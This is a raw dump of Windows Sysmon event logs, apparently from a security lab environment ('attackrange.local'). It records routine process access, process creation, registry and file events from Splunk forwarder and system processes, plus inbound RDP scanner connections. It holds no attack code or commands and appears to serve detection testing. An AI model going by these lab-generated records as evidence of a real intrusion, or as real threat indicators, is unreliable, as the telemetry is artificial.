14:52:55.532{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049083Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049082Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EAC7-607E-C706-00000000BB01}1780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049081Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EAC7-607E-C706-00000000BB01}1780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049080Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.533{85C0FFC9-EAC7-607E-C706-00000000BB01}1780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000049079Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:52:55.485{85C0FFC9-B7ED-607E-1000-00000000BB01}992C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d735f4-0xd8b6987f) 23542300x800000000000000049078Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.016{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2955C4A9AE039905F9A45BEE2BD3659,SHA256=5239A760EA52A3D509F037686BE07ABFF4EAE921ACE3554758B04F7DE2CF2707,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:56.895{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68F677E09D3C847FF8AA2F016E150FEC,SHA256=318C2836674E14FB014FB000AAF75B31FF1383123FFB6B69185ADD3429200BA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049110Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.657{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81C8F218C28F0DB274FE6BDD828E4439,SHA256=A9BA102E464A127C912EDC272C5AB588641A45CB4D420B43F57D84B3D27566EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:55.169{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com50176-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:54.640{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57433-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000062764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:54.640{A7A01FEF-B636-607E-2600-00000000BB01}2192C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57433-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000062763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:54.513{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54651-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:54.419{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-15870-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:54.296{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57432-false10.0.1.12-8000- 23542300x800000000000000062760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:56.676{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=203A1C3D146411FC3DAE02669C2E4B43,SHA256=C9939987EB1531E67A162D9A473B2163779146F37D5145EEF7086B96F4E58B09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049109Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EAC8-607E-C806-00000000BB01}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049108Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049107Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049106Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049105Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049104Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049103Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049102Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049101Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049100Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049099Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EAC8-607E-C806-00000000BB01}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049098Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EAC8-607E-C806-00000000BB01}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049097Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.204{85C0FFC9-EAC8-607E-C806-00000000BB01}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049096Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:56.157{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6BECCCD43B0F2CC347F370CC564AB26,SHA256=1C37297B4039BD89135C41ACB523444AF1EC480006EC7828425B18FD74FD754B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049095Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:53.566{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52007-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000049141Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.798{85C0FFC9-EAC9-607E-CA06-00000000BB01}34402988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049140Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EAC9-607E-CA06-00000000BB01}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049139Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049138Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 